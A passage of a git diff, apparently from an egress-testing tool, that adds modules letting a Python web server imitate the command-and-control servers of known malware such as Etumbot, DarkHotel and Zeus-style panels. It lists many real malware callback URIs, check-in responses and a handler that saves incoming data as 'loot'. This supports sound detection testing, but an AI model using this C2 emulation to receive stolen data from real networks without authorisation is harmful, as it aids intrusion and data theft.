"[*] Error: Please re-run and provide an action to perform!" parser.print_help() - sys.exit() + sys.exit(1) + + if args.actor is not None and args.ip is None: + print "[*] Error: You did not provide an IP to egress data to!" + print "[*] Error: Please re-run and provide an ip!" + sys.exit(1) return args diff --git a/common/orchestra.py b/common/orchestra.py index 7bb5a84..517fb0d 100644 --- a/common/orchestra.py +++ b/common/orchestra.py @@ -6,6 +6,8 @@ This is the conductor which controls everything import glob import imp +from commandcontrol.malware import * +from commandcontrol.apt import * from protocols.servers import * from protocols.clients import * from datatypes import * @@ -19,6 +21,7 @@ class Conductor: self.client_protocols = {} self.server_protocols = {} self.datatypes = {} + self.actor_modules = {} def load_client_protocols(self, command_line_object): for name in glob.glob('protocols/clients/*.py'): @@ -27,7 +30,6 @@ class Conductor: self.client_protocols[name] = loaded_client_proto.Client(command_line_object) return - def load_server_protocols(self, command_line_object): for name in glob.glob('protocols/servers/*.py'): if name.endswith(".py") and ("__init__" not in name): @@ -41,3 +43,14 @@ class Conductor: loaded_datatypes = imp.load_source(name.replace("/", ".").rstrip('.py'), name) self.datatypes[name] = loaded_datatypes.Datatype(command_line_object) return + + def load_actors(self, command_line_object): + for name in glob.glob('commandcontrol/malware/*.py'): + if name.endswith(".py") and ("__init__" not in name): + loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name) + self.actor_modules[name] = loaded_actors.Actor(command_line_object) + for name in glob.glob('commandcontrol/apt/*.py'): + if name.endswith(".py") and ("__init__" not in name): + loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name) + self.actor_modules[name] = loaded_actors.Actor(command_line_object) + return diff --git a/protocols/clients/https_client.py b/protocols/clients/https_client.py index 376d271..148c6e8 100644 --- a/protocols/clients/https_client.py +++ b/protocols/clients/https_client.py @@ -4,7 +4,6 @@ This is the web client code ''' -import ssl import sys import urllib2 @@ -24,15 +23,6 @@ class Client: self.file_transfer = cli_object.file def transmit(self, data_to_transmit): - # This restores the same behavior as before. - try: - _create_unverified_https_context = ssl._create_unverified_context - except AttributeError: - # Legacy Python that doesn't verify HTTPS certificates by default - pass - else: - # Handle target environment that doesn't support HTTPS verification - ssl._create_default_https_context = _create_unverified_https_context if not self.file_transfer: url = "https://" + self.remote_server + "/post_data.php" diff --git a/protocols/servers/serverlibs/web/base_handler.py b/protocols/servers/serverlibs/web/base_handler.py index 481b046..039ceb2 100644 --- a/protocols/servers/serverlibs/web/base_handler.py +++ b/protocols/servers/serverlibs/web/base_handler.py @@ -1,7 +1,11 @@ import os +import random import time from BaseHTTPServer import BaseHTTPRequestHandler from common import helpers +from commandcontrol.apt import * +from commandcontrol.malware import * +from protocols.servers.serverlibs.web import malware_callbacks class GetHandler(BaseHTTPRequestHandler): @@ -11,20 +15,67 @@ class GetHandler(BaseHTTPRequestHandler): # should be performing GET requests Help from # http://pymotw.com/2/BaseHTTPServer/ def do_GET(self): + if self.path in malware_callbacks.malware_uris: + self.send_response(200) + self.end_headers() - # 404 since we aren't serving up any pages, only receiving data - self.send_response(404) - self.end_headers() + elif self.path == malware_callbacks.etumbot_checkin: + self.send_response(200) + self.end_headers() + self.wfile.write(malware_callbacks.etumbot_checkin_response) + + elif ((self.path.startswith(malware_callbacks.etumbot_uri) or self.path.startswith(malware_callbacks.etumbot_uri2)) and (self.path.endswith(malware_callbacks.etumbot_extensions) or self.path.endswith(malware_callbacks.etumbot_extensions2)) or self.path.startswith(malware_callbacks.etumbot_uri3) or self.path.startswith(malware_callbacks.etumbot_uri4) or self.path.startswith(malware_callbacks.etumbot_uri5)): + # current directory + exfil_directory = os.path.join(helpers.ea_path(), "data") + loot_path = exfil_directory + "/" + if not os.path.isdir(loot_path): + os.makedirs(loot_path) + # Get the date info + current_date = time.strftime("%m/%d/%Y") + current_time = time.strftime("%H:%M:%S") + screenshot_name = current_date.replace("/", "") +\ + "_" + current_time.replace(":", "") + "actor_data.txt" + with open(loot_path + screenshot_name, 'a') as cc_data_file: + cc_data_file.write('etumbot just checked in here!\n') + self.send_response(200) + self.end_headers() + self.wfile.write(random.choice(malware_callbacks.encoded_response)) + + elif self.path == malware_callbacks.darkhotel_checkin: + self.send_response(200) + self.end_headers() + self.wfile.write('DEXT8726.168.15.192') + + elif self.path == malware_callbacks.darkhotel_checkin2: + self.send_response(200) + self.end_headers() + self.wfile.write('DEXT87no') + + elif self.path.startswith(malware_callbacks.darkhotel_uri): + exfil_directory = os.path.join(helpers.ea_path(), "data") + loot_path = exfil_directory + "/" + if not os.path.isdir(loot_path): + os.makedirs(loot_path) + # Get the date info + current_date = time.strftime("%m/%d/%Y") + current_time = time.strftime("%H:%M:%S") + screenshot_name = current_date.replace("/", "") +\ + "_" + current_time.replace(":", "") + "actor_data.txt" + with open(loot_path + screenshot_name, 'a') as cc_data_file: + cc_data_file.write('DarkHotel just checked in here!\n') + self.send_response(200) + self.end_headers() + self.wfile.write('DKCheckin good') + + else: + # 404 since we aren't serving up any pages, only receiving data + self.send_response(404) + self.end_headers() return # handle post request def do_POST(self): - # Gather the Posted URI from the agent/browser - # parsed_path = urlparse.urlparse(self.path) - uri_posted = self.path - uri_posted = uri_posted.replace("/", "") - #incoming_ip = self.client_address[0] # current directory exfil_directory = os.path.join(helpers.ea_path(), "data") loot_path = exfil_directory + "/" @@ -32,7 +83,7 @@ class GetHandler(BaseHTTPRequestHandler): # Info for this from - # http://stackoverflow.com/questions/13146064/simple- # python-webserver-to-save-file - if uri_posted == "post_data.php": + if self.path == "/post_data.php": self.send_response(200) self.end_headers() @@ -56,7 +107,7 @@ class GetHandler(BaseHTTPRequestHandler): with open(loot_path + screenshot_name, 'a') as cc_data_file: cc_data_file.write(screen_data) - elif uri_posted == "post_file.php": + elif self.path == "/post_file.php": self.send_response(200) self.end_headers() @@ -75,7 +126,7 @@ class GetHandler(BaseHTTPRequestHandler): with open(loot_path + file_name, 'wb') as cc_data_file: cc_data_file.write(file_data) - elif uri_posted == "posh_file.php": + elif self.path == "/posh_file.php": self.send_response(200) self.end_headers() @@ -91,6 +142,30 @@ class GetHandler(BaseHTTPRequestHandler): with open(loot_path + filename, 'wb') as cc_data_file: cc_data_file.write(data) + elif (self.path in malware_callbacks.malware_uris) or (self.path.startswith(other_uri) for other_uri in malware_callbacks.other_apt_uris): + + self.send_response(200) + self.end_headers() + + # Check to make sure the agent directory exists, and a loot + # directory for the agent. If not, make them + if not os.path.isdir(loot_path): + os.makedirs(loot_path) + + # Get the date info + current_date = time.strftime("%m/%d/%Y") + current_time = time.strftime("%H:%M:%S") + screenshot_name = current_date.replace("/", "") +\ + "_" + current_time.replace(":", "") + "actor_data.txt" + + # Read the length of the screenshot file being uploaded + screen_length = self.headers['content-length'] + screen_data = self.rfile.read(int(screen_length)) + + # Write out the file + with open(loot_path + screenshot_name, 'a') as cc_data_file: + cc_data_file.write(screen_data) + # All other Post requests else: diff --git a/protocols/servers/serverlibs/web/malware_callbacks.py b/protocols/servers/serverlibs/web/malware_callbacks.py new file mode 100644 index 0000000..3ae532d --- /dev/null +++ b/protocols/servers/serverlibs/web/malware_callbacks.py @@ -0,0 +1,208 @@ +''' + +This file is for managing malware/APT callbacks + +''' + +malware_uris = [ + '/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin', + '/jm32/includes/site/gate.php', '/mathew/config.jpg', + '/docs/.docs/config.jpg', '/docs/.docs/do.php', + '/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe', + '/zeujuus/a/modules/config.bin', + '/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/2HZG41Zw/bot.exe', + '/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin', + '/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/5GPR0iy9/bot.exe', + '/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg', + '/past/gate.php', '/fan/base/config.jpg', + '/wp-includes/pomo/panel/config.jpg', + '/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg', + '/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php', + '/home/plugins/system/tmp/bot.scr', + '/home/plugins/system/tmp/config.bin', + '/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg', + '/js/ssj/gate.php', '/site/tmp/xml/config.jpg', + '/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php', + '/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban', + '/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg', + '/vs/panel/gate.php', '/brand/server/file.php', + '/brand/server/gate.php', + '/wp-admin/css/colors/sunrise/admin/bot.exe', + '/wp-admin/css/colors/sunrise/admin/config.bin', + '/wp-admin/css/colors/sunrise/admin/secure.php', + '/wp-content/themes/chagim/library/images/plates/bot.exe', + '/wp-content/themes/chagim/library/images/plates/config.bin', + '/wp-content/themes/chagim/library/images/plates/gate.php', + '/images/burr_insurance001001.php', '/images/team/config.jpg', + '/images/team/gate.php', '/test/config.jpg', '/test/gate.php', + '/ray/server/file.php', '/ray/server/gate.php', '/capa.bin', + '/capa.exe', '/secure.php', '/ral/30/config.bin', + '/ral/30/secure.php', '/wp-admin/css/config.bin', + '/wp-admin/css/gate.php', '/wp-admin/css/setup.exe', + '/panel/config.jpg', '/panel/gate.php', + '/wp-includes2/SimplePie/Net/page/config.jpg', + '/wp-includes2/SimplePie/Net/page/gate.php', + '/includes/.srv/srv/bot.exe', + '/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php', + '/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin', + '/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg', + '/images2/gate.php', '/wp-includes/ID3/config.jpg', + '/wp-includes/ID3/gate.php', '/emman/panel/config.jpg', + '/emman/panel/gate.php', '/xampp/img/escu.bin', + '/xampp/img/escu.exe', '/xampp/img/secure.php', + '/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin', + '/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe', + '/isai/modules/mod_upgrade/config.bin', + '/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg', + '/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php', + '/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php', + '/img/vg.php', '/components/com_file/file.php', + '/components/com_file/gate.php', '/images/panel/config.jpg', + '/images/panel/gate.php', '/wordpress/gate.php', + '/wordpress/gree.jpg', '/media/.tmp/file.php', + '/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin', + '/modules/holl.exe', '/templates/admin/install/config.jpg', + '/templates/admin/install/gate.php', + '/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php', + '/tmp/cp/config.jpg', '/tmp/cp/gate.php', + '/tmp/install/config.jpg', '/tmp/install/gate.php', + '/frank/panel/config.jpg', '/frank/panel/gate.php', + '/tmp/configs/new/vg.php', '/meask/lite/file.php', + '/meask/lite/gate.php', '/css/src/admin/config.jpg', + '/css/src/admin/gate.php', '/js/admin/install/config.jpg', + '/js/admin/install/gate.php', + '/wp-content/plugins/wp-db-backup-made/work.php', + '/update/bot.exe', '/update/cfg.bin', '/update/gate.php', + '/chopinschumann/ital.bin', '/chopinschumann/ital.exe', + '/chopinschumann/secure.php', '/images/ital.bin', + '/images/ital.exe', '/images/secure.php', + '/compose/panel/bot.exe', '/compose/panel/config.bin', + '/compose/panel/secure.php', '/fy97/panel/config.bin', + '/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe', + '/images/secure.php', '/components/com_joomla/plugin/config.jpg', + '/components/com_joomla/plugin/gate.php', + '/resource/css/config.bin', '/resource/css/secure.php', + '/wp-content/upgrade/PANEL/config.jpg', + '/wp-content/upgrade/PANEL/gate.php', + '/wp-content/plugins/bcet56aoikqf52iu/food.php', + '/Scripts/_notes/build/bot.exe', + '/Scripts/_notes/build/config.bin', + '/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe', + '/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php', + '/KINS/panel/bot.exe', '/KINS/panel/config.jpg', + '/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php', + '/walex/files/bot.exe', '/walex/files/config.jpg', + '/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin', + '/e7/gate.php', + '/wp-admin/css/colors/coffee/cat/server/config.jpg', + '/wp-admin/css/colors/coffee/cat/server/gate.php', + '/site/S/13897652/5112/file.php', + '/site/S/13897652/5112/gate.php', + '/images/js/osomo/panel/config.jpg', + '/images/js/osomo/panel/gate.php', + '/themes/panel/config.jp', '/themes/panel/gate.php', + '/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php', + '/wqwcqqw/sasasacw.php', '/images/server/file.php', + '/images/server/gate.php', '/cache/lcitorg/config.bin', + '/cache/lcitorg/gate.php', '/form/panel/config.jpg', + '/form/panel/gate.php', '/backup/gate.php', + '/backup/jera.jpg', '/images/file.php', + '/images/js/panel/config.jpg', '/images/js/panel/gate.php', + '/images/config.jpg', '/images/gate.php', + '/slim-cita/helps/file.php', '/slim-cita/helps/gate.php', + '/kin/panelz/config.jpg', '/kin/panelz/gate.php', + '/image/Panel/config.jpg', '/folder/config.bin', + '/folder/secure.php', '/plugins/panel/config.jpg', + '/plugins/panel/gate.php', + '/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php', + '/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php', + '/js/MOM/config.jpg', '/js/MOM/gate.php', + '/lung/panel/config.jpg', '/wp/config.jpg', + '/wp/gate.php', '/data/config.jpg', '/data/gate.php', + '/templates/beez/bot.exe', '/templates/beez/config.bin', + '/templates/beez/gate.php', '/wp-includes/css/new/config.jpg', + '/wp-includes/css/new/gate.php', + '/language/pdf_fonts/server/bot.exe', + '/language/pdf_fonts/server/config.bin', + '/language/pdf_fonts/server/gate.php', '/js/liscence.php', + '/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php', + '/Mix/valeg/bot.exe', '/Mix/valeg/config.bin', + '/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php', + '/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg', + '/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg', + '/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php', + '/admin/b7.php', '/admin/file.php', '/amed/config.jpg', + '/amed/gate.php', '/sadcxvbv/vdfbffddf.php', + '/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php', + '/percy/panel/config.jpg', '/percy/panel/gate.php', + '/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png', + '/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg', + '/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg', + '/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg', + '/news/secure.php', '/news/vuan.bin', '/.id/file.php', + '/.id/gate.php', + '/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php', + '/overopen/panel/config.bin', '/overopen/panel/secure.php', + '/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php', + '/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php', + '/wp-comment/baba.jpg', '/wp-comment/gate.php', + '/alumno309/images/base.bin', '/alumno309/images/base.exe', + '/alumno309/images/secure.php', + '/wp-content/plugins/wp-db-backup-made/das.db', + '/ta_images/tools.php', '/plank/panel/config.jpg', + '/includes/database/http/config.jpg', + '/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php', + '/administrator/modules/mod_menu/help/config.jpg', + '/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin', + '/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe', + '/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php', + '/forum.php', '/config.php', '/wp-blog/gate.php', + '/wp-blog/mell.jpg', '/descargas/adm/gate.php', + '/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php', + '/images/outl.jpg', '/images/smilies/raye.jpg', + '/images/kin/config.jpg', '/jaextmanager_data/rimm.bin', + '/jaextmanager_data/secure.php', '/js/cssme/file.php', + '/js/cssme/thread.php', '/mss/plugins/system/config.bin', + '/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin', + '/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot', + '/images/secure.php', '/images/todo.bin', '/images/todo.exe', + '/plugins/system/bot.exe', '/plugins/system/config.bin', + '/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php', + '/modules/mod_footer/tmpl/gate.php', '/modules/secure.php', + '/modules/warp.bin', '/modules/warp.exe', '/file.php', + '/gate.php', '/db1/config.jpg', '/db1/gate.php', + '/katolog/thumbs/panel/config.jpg', + '/katolog/thumbs/panel/gate.php', '/home/index.asp?typeid=13'] + +other_apt_uris = [ + '/search5', '/microsoft/errorpost/default.aspx?ID=', + '/MicrosoftUpdate/ShellEX/KB', '/MicrosoftUpdate/WWRONG/KB', + '/MicrosoftUpdate/GetFiles/KB', '/MicrosoftUpdate/GetUpdate/KB'] + +etumbot_checkin = '/home/index.asp/typeid=13' +etumbot_checkin_response = 'AQAAAAAAAABlNjV3YjI0bjUAAAAAAAAAAAAAAG5FAVBvIz8hYk08ITI4BA0lMTBvBRx0NB18BndMcFMKQhR5PxxkQ3VnFEALeXA6C3RPBmJLHBBccHQINEl9I3kMUk0lOT4wCFgqD3khTjl5IEAqGzU_DmtUeEJBYSQHEiwRADteMEFjTw5oXgtjGkUxL14JPlwyYQQXPkVaQiAyUBEaJWlkOQEmZRoXZ10EN3RndH0kbEErew0NUklhFRlpNDJofS1hPQMCeWUvHSQPA2ZAPHEcCRkLPURbCC8bdTgIXXcIBhBbVlhjdB8iL2Y_TCNldTNjZkEvB0M5BWtaOkBALj4KIA5UBjhVPxhhSk1fAwdKKi8zdhl6TkthRUZAOQdICRgFEgY0dwpQNjtlQgR8DzM9N3NQBhteHgdwaVtycDZvS1Q3CTYhARI1GBMrWh1FQxcdQhV7MSx' +etumbot_uri = '/history/' +etumbot_uri2 = '/image/' +etumbot_uri3 = '/article/30441/Review.asp?' +etumbot_uri4 = '/manage/asp/item.asp?id=' +etumbot_uri5 = '/tech/s.asp?m=' +etumbot_extensions = '.jpg' +etumbot_extensions2 = '.asp' + +encoded_response = [ + 'dGhpc2lzZ29pbmd0b2JlIGEgcmVhbGx5IGJpZyByZXNwb25zZSBob3BlZnVsbHkuICBXZSByZWFsbHkgd2FudCB0aGVyZSB0byBiZSBhIGxvdCBvZiBkYXRhIHNvIHRoYXQgSSBjYW4gc2ltbGF0ZSB0aGUgd2ViIHJlc3BvbnNlIGJlaW5nIEMyIGNvbW1hbmRzIGZyb20gdGhlIHV0dW1ib3Qgc2VydmVyLiAgSSBkbyBub3Qga25vdyB3aGF0IGlzIGdvaW5nIHRvIGhhcHBlbiwgYnV0IEkgd2lsbCBjb250aW51ZSB0byB0cnkgdG8gZGV2ZWxvcCBhIGxvdCBvZiBtYWx3YXJlIG1vZHVsZSBmb3IgZWdyZXNzLWFzc2Vzcy4gIGl0IGhhcyBiZWVuIGEgbG90IG9mIGZ1bg--', + 'SSBhbSBnb2luZyB0byBjb250aW51ZSB0byBkZXZlbG9wIGVncmVzcy1hc3Nlc3MgbW9kdWxlcyBhbmQgdGhpcyBpcyBnb2luZyB0byBiZSBvbmUgb2YgdGhlbS4gIFRoZSBpbml0aWFsIHJlbGVhc2UgZm9yIHRoZXNlIG1hbHdhcmUgYW5kIEFQVCBncm91cCBtb2R1bGVzIGlzIGdvaW5nIHRvIGJlIGF0IFNBTlMgSEFDS0ZFU1QgaW4gd2FzaGluZ3RvbiBEQy4gIElmIHlvdSBhcmUgd2FudGluZyB0byBnZXQgdGhlIGxhdGVzdCBlZ3Jlc3MtYXNzZXNzIG1vZHVsZXMgdGhlIGVhcmxpZXN0IHRoYXQgeW91IGNhbiwgYmUgc3VyZSB0byBnZXQgdGhlcmUgYXQgSEFDS0ZFU1QgYW5kIHNlZSBzdGV2ZSBhbmQgSSB0YWxrLg--', + 'U3RldmUgaXMgdGhlIG1hbiwgYW5kIGhhcyBiZWVuIGdyZWF0IHRvIHdvcmsgd2l0aCBvbiBFZ3Jlc3MtQXNzZXNzLiAgSGUgd2FzIGFjdHVhbGx5IHRoZSBvbmUgd2hvIGNhbWUgdXAgd2l0aCB0aGUgaWRlYSBvZiBoYXZpbmcgdXMgZW11bGF0ZSBkaWZmZXJlbnQgcGllY2VzIG9mIG1hbHdhcmUgb3IgaGFja2luZyBncm91cHMuICBXZSB0YWxrZWQgYWJvdXQgaXQgYW5kIHRob3VnaHQgaXQgd2FzIGEgZ3JlYXQgaWRlYSwgc28gaGVyZSB3ZSBhcmUh', + 'VGhpcyBpcyBwcm9iYWJseSB0aGUgY2xvc2VzdCB0aGluZyB0byBhbiBlYXN0ZXIgZWdnIHRoYXQgd2UgaGF2ZSBjdXJyZW50bHkgaW4gRWdyZXNzLUFzc2Vzcy4gIFRoZXJlIGlzIG5vdCBhIGxvdCBvZiBvdGhlciBhcmVhcyB3aGVyZSBhbnl0aGluZyBjb3VsZCByZWFsbHkgYmUgaGlkZGVuIHdpdGhpbiB0aGlzIHByb2dyYW0sIGJ1dCBpdCB3b3VsZCBiZSBraW5kIG9mIGZ1bm55IHRvIGhlYXIgaWYgYW55b25lIGVsc2UgYWN0dWFsbHkgZmluZHMgdGhpcyBkYXRhLg--', + 'T25lIHRoaW5nIHRoYXQgSSBkZWZpbml0ZWx5IGhhdmUgbGVhcm5lZCBpcyB0aGF0IGl0IGlzIGhhcmQgdG8gd29yayBvbiB3cml0aW5nIGRpZmZlcmVudCBzb2Z0d2FyZSBhbmQgaGF2ZSB0d28ga2lkcyBhdCB0aGUgc2FtZSB0aW1lLiAgSG9wZWZ1bGx5IEkgd2lsbCBiZSBhYmxlIHRvIGRvIHRoaXMsIGJ1dCBpdCB3aWxsIGJlIGEgbG90IGZhc3RlciBvbmNlIHRoZSBraWRzIGdldCBhIGxpdHRsZSBiaXQgb2xkZXIgYW5kIEkgY2FuIHRoZW4gc3BlbmQgbW9yZSB0aW1lIG9uIHRoaXMu', + 'U28gZmFyLCB3ZSBkbyBub3QgYWN0dWFsbHkgaGF2ZSBhbnlvbmUgdGhhdCBoYXMgc3VibWl0dGVkIGFueSBwdWxsIHJlcXVlc3RzIHRvIEVncmVzcy1Bc3Nlc3MuICBXZSBkZWZpbml0ZWx5IHRoaW5rIGl0IHdvdWxkIGJlIGF3ZXNvbWUgaWYgc29tZW9uZSBlbHNlIGFkZGVkIHNvbWUgZmVhdHVyZXMgdG8gRWdyZXNzLUFzc2Vzcywgb3Igc2VuZCB1cyBtb2R1bGVzIHNvIHRoYXQgd2UgY2FuIGdldCBpdCBhZGRlZCBpbiB0byB0aGUgdG9vbCE-', + 'VGhpcyB3aWxsIG1ha2UgbGlmZSBlYXN5LCBob3BlZnVsbHkgZXZlcnlvbmUgaXMgYWJsZSB0byB1c2UgdGhpcyB0b29sIHRvIHRlc3QgaWYgdGhlaXIgbmV0d29ya3MgYWN0dWFsbHkgY2F0Y2ggYW55IG9mIHRoZSBkYXRhIGxlYXZpbmcgdGhlaXIgbmV0d29yaywgb3IgYW55IG9mIHRoZSBwaWVjZXMgb2YgbWFsd2FyZSBvcGVyYXRpbmcgd2l0aGluIHRoZWlyIG5ldHdvcmsuICBZb3Ugc2hvdWxkIGFsbCB0ZXN0IGl0IG91dCBhbmQgc2VlIGlmIHlvdSBjYW4gY2F0Y2ggdGhpcyE-', + 'V2VsbCB0aGlzIGlzIGdvaW5nIHRvIGJlIHRoZSBsYXN0IGV0dW1ib3QgcmVzcG9uc2UgZm9yIG5vdy4gIElmIHNvbWVvbmUgZWxzZSBpcyBhY3R1YWxseSByZWFkaW5nIHRoZXNlLCB5b3Ugc2hvdWxkIGRlbW9uc3RyYXRlIHRoYXQgeW91IGhhdmUgcmVhZCB0aGVzZSBieSBhZGRpbmcgYSByZXNwb25zZSBzcGVjaWZpY2FsbHkgdGhpcyBldHVtYm90IHJlc3BvbnNlcy4gIEl0IHdpbGwgYmUgdGhpcyBsaXR0bGUgZWFzdGVyZWdnIDop', + 'SSB3b3VsZCByZWFsbHkgbGlrZSB0byB0aGluayB0aGF0IGF0IHNvbWUgcG9pbnQgSSBoYXZlIGdlbmVyYXRlZCBlbm91Z2ggb2YgdGhlc2UgZW5jb2RlZCBtb2R1bGVzLiAgSW4gdGhlIG1lYW50aW1lLCBzb21lIGZpbGxlciEgIFlvdSBndXlzIHNob3VsZCBiZSBzdXJlIHRvIGdvIHZpc2l0IG15IHdlYiBwYWdlIGF0IGNocmlzdG9waGVydHJ1bmNlci5jb20gYmVjYXVzZSBJIHRyeSB0byB3cml0ZSBzb21lIHVzZWZ1bCBhcnRpY2xlcyB0aGVyZSB0aGF0IGhlbHAgb3RoZXJzIGluIHRoZSBjb21tdW5pdHkh', + 'QW5kIHRoaXMgaXMgYWN0dWFsbHkgdGhlIGxhc3Qgb25lIHRoYXQgSSBhbSBtYWtpbmcuICBJZiB5b3UgZ3V5cyB3YW50IHRvIGxlYXJuIGhvdyB0byBieXBhc3MgYW50aXZpcnVzLCBlc3BlY2lhbGx5IHNpbmNlIGl0IHJlYWxseSBpcyBqdXN0IGEgam9rZSwgeW91IHNob3VsZCBiZSBzdXJlIHRvIHBsYXkgYXJvdW5kIHdpdGggVmVpbC1FdmFzaW9uIGFuZCBsZWFybiBob3cgdG8gdXNlIGl0IGF0IHZlaWwtZnJhbWV3b3JrLmNvbS4gIEkgaG9wZSB0aGF0IHRoYXQgaGVscHMh'] + +darkhotel_checkin = '/major/images/view.php' +darkhotel_checkin2 = '/major/txt/read.php' +darkhotel_uri = '/bin/read_i.php?a1=' \ No newline at end of file